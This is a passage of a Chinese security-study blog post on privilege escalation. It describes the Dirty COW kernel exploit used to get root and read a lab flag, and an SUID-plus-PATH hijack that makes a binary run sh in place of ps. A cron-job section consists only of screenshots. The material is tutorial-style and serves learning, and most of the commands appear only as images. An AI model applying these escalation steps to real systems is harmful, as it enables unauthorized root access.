                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022211842805.png"
                      alt="image-20221022211842805" style="zoom:150%;" 
                >

<p>因为是.cpp文件所以需要进行编译，第一行为编译命令，就会生成一个dcow文件</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022212012161.png"
                      alt="image-20221022212012161" style="zoom:150%;" 
                >

<p>由于该漏洞利用具有交互式，得确保交互式才能正常回显，所以需要第二行的命令来开启交互式<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022212514715.png"
                      alt="image-20221022212514715"
                ></p>
<p>然后运行.&#x2F;dcow即可得到一个root账户的密码</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022212609301.png"
                      alt="image-20221022212609301" style="zoom:150%;" 
                >

<p>然后切换root账户进行登入<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022212727952.png"
                      alt="image-20221022212727952"
                ></p>
<p>获得root权限<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022212746567.png"
                      alt="image-20221022212746567"
                ></p>
<p>然后就可以访问&#x2F;root目录下的文件发现有一个flag.txt文件，访问flag.txt就可以得到flag</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022212927461.png"
                      alt="image-20221022212927461" style="zoom:150%;" 
                >

<p>完成！！！</p>
<h3 id="Linux环境变量-amp-定时任务-amp-数据库"><a href="#Linux环境变量-amp-定时任务-amp-数据库" class="headerlink" title="Linux环境变量&amp;定时任务&amp;数据库"></a>Linux环境变量&amp;定时任务&amp;数据库</h3><h4 id="Linux提权本地环境变量安全"><a href="#Linux提权本地环境变量安全" class="headerlink" title="Linux提权本地环境变量安全"></a>Linux提权本地环境变量安全</h4><p>配合SUID进行环境变量提权-本地用户环境下</p>
<p>过程：手写调用文件—编译—复制文件—增加环境变量—执行触发</p>
<p>步骤：</p>
<p>通过命令<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221024162713543.png"
                      alt="image-20221024162713543"
                ></p>
<p>将demo.c文件编译成shell文件</p>
<p>demo.c源代码<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221024162933036.png"
                      alt="image-20221024162933036"
                ></p>
<p>就是执行ps文件</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221024162333961.png"
                      alt="image-20221024162333961" style="zoom:200%;" 
                >



<p>加个.&#x2F;ps就是执行sh了</p>
<p>在变量PATH&#x3D;&#x2F;tmp中添加&#x2F;tmp变量，执行的是ps（当时实际上执行的是sh）</p>
<p>执行shell文件实际上就是demo.c文件，源代码是运行ps但是实际上是运行了sh，造成root权限</p>
<p>那为什么是运行sh呢？ 前面说过正常输入ps其实就是运行ps，只有.&#x2F;ps才能调用sh运行，但是因为前面设置了环境变量&#x2F;tmp所以默认是调用tmp里面的ps，也就是运行sh</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221024163227059.png"
                      alt="image-20221024163227059" style="zoom:150%;" 
                >







<h4 id="Linux定时任务安全–本地"><a href="#Linux定时任务安全–本地" class="headerlink" title="Linux定时任务安全–本地"></a>Linux定时任务安全–本地</h4><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221024165155471.png"
                      alt="image-20221024165155471"
                ></p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221024210529479.png"
                      alt="image-20221024210529479" style="zoom:150%;" 
                >

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221027213507541.png"
                      alt="image-20221027213507541"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221027221254785.png"
                      alt="image-20221027221254785"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221027221305324.png"
                      alt="image-20221027221305324"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221027222303044.png"
                      alt="image-20221027222303044"
                ></p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221027223034688.png"
                      alt="image-20221027223034688" style="zoom:150%;" 
                >

<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221027223233692.png"
                      alt="image-20221027223233692" style="zoom:150%;" 
                >

            </div>

            
                <div class="post-copyright-info">
                    <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> 权限提升</li>
        <li><strong>Author:</strong> yuBetter</li>
        <li><strong>Created at:</strong> 2023-04-14 21:33:42</li>
        
            <li>
                <strong>Updated at:</strong> 2023-04-14 21:34:45
            </li>
        
        <li>
            <strong>Link:</strong> https://yubetter.github.io/2023/04/14/权限提升/
        </li>
        <li>
            <strong>License:</strong> This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0</a>.
        </li>
    </ul>
</div>

                </div>
            

            

            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                            rel="prev"
                            href="/2023/04/14/Kerberos%E6%94%BB%E5%87%BB/"
                            >
                                <span class="left arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-left"></i>
                                </span>
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">Kerberos攻击</span>
                                    <span class="post-nav-item">Prev posts</span>
                                </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                            rel="next"
                            href="/2023/04/14/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/"
                            >
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">内网安全</span>
                                    <span class="post-nav-item">Next posts</span>
                                </span>
                                <span class="right arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-right"></i>
                                </span>
                            </a>
                        </div>
                    
                </div>
            


            
                <div class="comment-container">
                    <div class="comments-container">
    <div id="comment-anchor"></div>
    <div class="comment-area-title">
        <i class="fa-solid fa-comments"></i>&nbsp;Comments
    </div>
    

        
            
 
    <div id="waline"></div>
    <script type="module"  data-pjax>
        import { init } from 'https://evan.beee.top/js/waline.mjs';

        function loadWaline() {
            init({
                el: '#waline',
                serverURL: 'https://example.example.com',
                lang: 'zh-CN',
                dark: 'body[class~="dark-mode"]',
                requiredMeta: ['nick','mail'], // cannot customize by theme config, change it yourself
            });
        }

        if ('true') {
            const loadWalineTimeout = setTimeout(() => {
                loadWaline();
                clearTimeout(loadWalineTimeout);
            }, 1000);
        } else {
            window.addEventListener('DOMContentLoaded', loadWaline);
        }
        
    </script>



        
    
</div>

                </div>
            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">权限提升</div>
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BD%91%E7%AB%99%E6%9D%83%E9%99%90%E5%90%8E%E5%8F%B0%E6%BC%8F%E6%B4%9E"><span class="nav-text">网站权限后台漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#win%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%8F%8AAT-amp-SC-amp-PS%E6%8F%90%E6%9D%83"><span class="nav-text">win溢出漏洞及AT&amp;SC&amp;PS提权</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MY-amp-MS-amp-ORA%E7%AD%89SQL%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83"><span class="nav-text">MY&amp;MS&amp;ORA等SQL数据库提权</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#mysql%E6%8F%90%E6%9D%83"><span class="nav-text">mysql提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQLSever%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83"><span class="nav-text">SQLSever数据库提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Oracle%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83"><span class="nav-text">Oracle数据库提权</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Redis-amp-Postgre-amp-%E4%BB%A4%E7%89%8C%E7%AA%83%E5%8F%96-amp-%E8%BF%9B%E7%A8%8B%E6%B3%A8%E5%85%A5"><span class="nav-text">Redis&amp;Postgre&amp;令牌窃取&amp;进程注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Redis%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="nav-text">Redis数据库权限提升</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#postgresql%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83"><span class="nav-text">postgresql数据库提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Windows2008-amp-7%E4%BB%A4%E7%89%8C%E7%AA%83%E5%8F%96%E6%8F%90%E5%8D%87-%E6%9C%AC%E5%9C%B0"><span class="nav-text">Windows2008&amp;7令牌窃取提升-本地</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Windows2003-amp-10%E6%B3%A8%E5%85%A5%E6%8F%90%E5%8D%87"><span class="nav-text">Windows2003&amp;10注入提升</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%83%82%E5%9C%9F%E8%B1%86-amp-dll%E5%8A%AB%E6%8C%81-amp-%E5%BC%95%E5%AF%BC%E8%B7%AF%E5%BE%84-amp-%E6%9C%8D%E5%8A%A1%E6%9D%83%E9%99%90%E2%80%94%E6%8F%90%E6%9D%83"><span class="nav-text">烂土豆&amp;dll劫持&amp;引导路径&amp;服务权限—提权</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#linux%E6%8F%90%E6%9D%83"><span class="nav-text">linux提权</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#linux%E8%84%8F%E7%89%9B%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E"><span class="nav-text">linux脏牛内核漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Linux%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F-amp-%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1-amp-%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="nav-text">Linux环境变量&amp;定时任务&amp;数据库</span></a></li></ol></li></ol>

    </div>
</div>
            </div>
        
    </div>
</div>


                

            </div>
            
            

        </div>

        <div class="main-content-footer">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info">
            &copy;
            
              <span>2022</span>
              -
            
            2023&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">yuBetter</a>
        </div>
        
            <script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv" class="busuanzi_container_site_uv">
                        VISITOR COUNT&nbsp;<span id="busuanzi_value_site_uv" class="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="busuanzi_container_site_pv">
                        TOTAL PAGE VIEWS&nbsp;<span id="busuanzi_value_site_pv" class="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            <span class="powered-by-container">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" href="https://hexo.io">Hexo</a></span>
                <br>
            <span class="theme-version-container">THEME&nbsp;<a class="theme-version" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.1.1</a>
        </div>
        
        
        
            <div id="start_div" style="display:none">
                2022/8/17 11:45:14
            </div>
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
        
            <script async data-pjax>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fa-regular fa-comments"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-expand-width flex-center">
            <i class="fa-regular fa-expand"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    


</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/layouts/navbarShrink.js"></script>

<script src="/js/tools/scrollTopBottom.js"></script>

<script src="/js/tools/lightDarkSwitch.js"></script>





    
<script src="/js/tools/codeBlock.js"></script>




    
<script src="/js/layouts/lazyload.js"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/layouts/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js"></script>







<div class="post-scripts pjax">
    
        
<script src="/js/tools/tocToggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/layouts/toc.js"></script>

<script src="/js/plugins/tabs.js"></script>

    
</div>


    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax',
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            Global.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            Global.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            Global.refresh();
        });
    });
</script>




</body>
</html>
